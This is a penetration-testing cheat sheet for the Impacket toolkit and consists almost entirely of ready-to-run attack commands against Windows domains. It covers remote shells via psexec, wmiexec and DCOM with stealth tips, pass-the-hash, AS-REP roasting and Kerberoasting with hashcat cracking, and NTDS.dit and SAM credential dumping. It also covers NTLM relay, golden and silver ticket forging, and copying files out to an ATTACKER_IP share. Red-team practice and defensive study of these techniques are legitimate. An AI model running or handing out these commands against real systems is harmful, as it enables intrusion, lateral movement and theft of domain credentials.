
Impacket

A collection of Python classes for working with network protocols, essential for Windows and Active Directory penetration testing.

Installation

# Install via pip
pip install impacket

# Or from source
git clone https://github.com/fortra/impacket.git
cd impacket
pip install .

SMB Enumeration

smbclient.py

# List shares
smbclient.py domain/user:password@target

# Null session
smbclient.py target

# With hash
smbclient.py -hashes :NTHASH domain/user@target

# List shares only
smbclient.py domain/user:password@target -list

smbserver.py

# Start SMB server for file transfers
impacket-smbserver share $(pwd) -smb2support

# With authentication
impacket-smbserver share $(pwd) -smb2support -username user -password pass

# Windows access
# net use \\ATTACKER_IP\share
# copy file.txt \\ATTACKER_IP\share\

Remote Execution

psexec.py

# Execute with credentials
psexec.py domain/user:password@target

# With NTLM hash
psexec.py -hashes :NTHASH domain/user@target

# Different service name (stealth)
psexec.py domain/user:password@target -service-name CustomSvc

# Execute command
psexec.py domain/user:password@target "whoami"

wmiexec.py

# WMI execution (no service creation)
wmiexec.py domain/user:password@target

# With hash
wmiexec.py -hashes :NTHASH domain/user@target

# Execute command
wmiexec.py domain/user:password@target "ipconfig"

# Quieter than psexec, no SMB writes

atexec.py

# Execute via Task Scheduler
atexec.py domain/user:password@target "whoami"

# With hash
atexec.py -hashes :NTHASH domain/user@target "ipconfig"

dcomexec.py

# Execute via DCOM
dcomexec.py domain/user:password@target

# With hash
dcomexec.py -hashes :NTHASH domain/user@target

# Different DCOM object
dcomexec.py -object MMC20 domain/user:password@target

Kerberos Attacks

GetNPUsers.py

AS-REP Roasting - extract AS-REP hashes for accounts that have "Do not require Kerberos preauthentication" set

# Single user
GetNPUsers.py domain/user -dc-ip 192.168.1.10 -no-pass

# User list
GetNPUsers.py domain/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass

# Domain format
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 192.168.1.10

# Request format for Hashcat
GetNPUsers.py domain/ -usersfile users.txt -format hashcat -dc-ip 192.168.1.10

# Output to file
GetNPUsers.py domain/ -usersfile users.txt -dc-ip 192.168.1.10 -outputfile asrep_hashes.txt

Crack with Hashcat:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

GetUserSPNs.py

Kerberoasting - request TGS tickets for accounts that have an SPN registered (service accounts)

# Enumerate SPNs
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10

# Request TGS tickets
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request

# Output to file
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request -outputfile tgs_hashes.txt

# With hash
GetUserSPNs.py -hashes :NTHASH domain/user -dc-ip 192.168.1.10 -request

# Save tickets
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request-user SPN_USER -save

Crack with Hashcat:

hashcat -m 13100 tgs_hashes.txt /usr/share/wordlists/rockyou.txt

getTGT.py

Request TGT (Ticket Granting Ticket)

# Get TGT with password
getTGT.py domain/user:password

# Get TGT with hash
getTGT.py -hashes :NTHASH domain/user

# Specify DC
getTGT.py domain/user:password -dc-ip 192.168.1.10

# getTGT.py writes user.ccache; point KRB5CCNAME at it so other scripts can use it with -k
export KRB5CCNAME=user.ccache

getST.py

Request Service Ticket

# Request ST for specific SPN
getST.py -spn cifs/target.domain.local domain/user:password

# With NTLM hash instead of a password
getST.py -spn cifs/target.domain.local -hashes :NTHASH domain/user

# Impersonate another user via S4U (S4U2Self, then S4U2Proxy to the requested SPN; the account needs delegation rights)
getST.py -spn cifs/target.domain.local -impersonate administrator domain/user:password

Credential Dumping

secretsdump.py

Extract credentials from various sources

# Offline dump from exported SAM/SECURITY/SYSTEM hive files
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

# Remote dump via SMB
secretsdump.py domain/user:password@target

# With hash
secretsdump.py -hashes :NTHASH domain/user@target

# NTDS.dit dump
secretsdump.py domain/user:password@dc.domain.local -just-dc

# NTDS with specific user
secretsdump.py domain/user:password@dc.domain.local -just-dc-user administrator

# NTDS dump, NTLM hashes only (skips Kerberos keys; the target must be a DC)
secretsdump.py domain/user:password@target -just-dc-ntlm

# Historical passwords
secretsdump.py domain/user:password@dc.domain.local -history

# NTDS via a VSS shadow copy instead of the default DRSUAPI method
secretsdump.py domain/user:password@target -use-vss

mimikatz.py

Client for a mimikatz instance already running as an RPC server on the target

# Execute mimikatz commands
mimikatz.py domain/user:password@target

# Example commands once connected:
# lsadump::sam
# sekurlsa::logonpasswords

NTLM Relay

ntlmrelayx.py

# Relay to SMB
ntlmrelayx.py -t smb://target -smb2support

# Relay with specific target list
ntlmrelayx.py -tf targets.txt -smb2support

# Dump SAM
ntlmrelayx.py -t smb://target -smb2support --sam

# Execute command
ntlmrelayx.py -t smb://target -smb2support -c "whoami"

# SOCKS proxy
ntlmrelayx.py -tf targets.txt -smb2support -socks

# Relay to LDAP (domain enumeration; --escalate-user additionally tries to escalate the named account)
ntlmrelayx.py -t ldap://dc.domain.local --escalate-user lowpriv

# Relay to HTTP
ntlmrelayx.py -t http://target/api -smb2support

LDAP Enumeration

GetADUsers.py

# Enumerate domain users
GetADUsers.py -all domain/user:password -dc-ip 192.168.1.10

# With hash
GetADUsers.py -all -hashes :NTHASH domain/user -dc-ip 192.168.1.10

# Specific user details
GetADUsers.py domain/user:password -dc-ip 192.168.1.10 -user administrator

GetUserSPNs.py

# List all SPNs
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10

# Request specific SPN
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request-user svcSQL

Database Attacks

mssqlclient.py

# Connect to MSSQL
mssqlclient.py domain/user:password@target

# Windows authentication
mssqlclient.py -windows-auth domain/user:password@target

# With hash
mssqlclient.py -hashes :NTHASH domain/user@target

# Connect to a specific database
mssqlclient.py domain/user:password@target -db master

# Once connected:
# enable_xp_cmdshell
# xp_cmdshell whoami

Network Sniffing

sniffer.py

# Capture packets
sniffer.py -i eth0

# Filter by host
sniffer.py -i eth0 -filter "host 192.168.1.10"

DPAPI

dpapi.py

# Decrypt a DPAPI master key using the user's SID and password
dpapi.py masterkey -file masterkey_file -sid S-1-5-21... -password password

# Decrypt a DPAPI credential file (quote file names that contain spaces, e.g. "Login Data")
dpapi.py credential -file Login Data

Golden/Silver Tickets

ticketer.py

# Forge a golden ticket (requires the krbtgt NT hash and the domain SID)
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local administrator

# Forge a silver ticket for one SPN (requires that service account's NT hash)
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/target.domain.local administrator

# Use ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass domain.local/administrator@target.domain.local

LDAP Queries

ldapdomaindump (separate tool, not an Impacket script)

# Dump domain information
ldapdomaindump domain/user:password -d dc.domain.local

# Output to directory
ldapdomaindump domain/user:password -d dc.domain.local -o output/

Useful Scripts

lookupsid.py

Enumerate domain users and groups by SID (RID brute force)

# Brute force SIDs
lookupsid.py domain/user:password@target

# With hash
lookupsid.py -hashes :NTHASH domain/user@target

# RID cycling up to a maximum RID (here 500)
lookupsid.py domain/user:password@target 500

rpcdump.py

Enumerate RPC endpoints

# Dump RPC info
rpcdump.py domain/user:password@target

# With hash
rpcdump.py -hashes :NTHASH domain/user@target

samrdump.py

Enumerate users remotely via SAMR (lists accounts; does not dump hashes)

# Enumerate users via SAM
samrdump.py domain/user:password@target

# With hash
samrdump.py -hashes :NTHASH domain/user@target

reg.py

Remote registry operations

# Query registry
reg.py domain/user:password@target query -keyName HKLM\\SOFTWARE\\Microsoft

# Save registry hive
reg.py domain/user:password@target backup -keyName HKLM\\SAM

# With hash
reg.py -hashes :NTHASH domain/user@target query -keyName HKLM\\SYSTEM

Common Workflows

Initial Access from Hash

# 1. Test access (crackmapexec is a separate tool, not part of Impacket)
crackmapexec smb target -u administrator -H NTHASH

# 2. Execute commands
wmiexec.py -hashes :NTHASH domain/administrator@target

# 3. Or get shell
psexec.py -hashes :NTHASH domain/administrator@target

Domain Enumeration

# 1. Get domain users
GetADUsers.py -all domain/user:password -dc-ip DC_IP > users.txt

# 2. Look for AS-REP roastable accounts
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP

# 3. Look for Kerberoastable accounts
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request

Credential Dumping Workflow

# 1. Dump local creds
secretsdump.py domain/user:password@target

# 2. If domain admin, dump NTDS
secretsdump.py domain/admin:password@dc.domain.local -just-dc

# 3. Extract NTLM hashes
secretsdump.py domain/admin:password@dc.domain.local -just-dc-ntlm -outputfile ntds_hashes

Quick Reference

# SMB access
smbclient.py domain/user:password@target

# Remote shell
psexec.py domain/user:password@target
wmiexec.py domain/user:password@target

# AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP

# Kerberoasting
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request

# Dump credentials
secretsdump.py domain/user:password@target
secretsdump.py domain/admin:password@dc -just-dc

# NTLM Relay
ntlmrelayx.py -tf targets.txt -smb2support

# With hash (any tool)
TOOL.py -hashes :NTHASH domain/user@target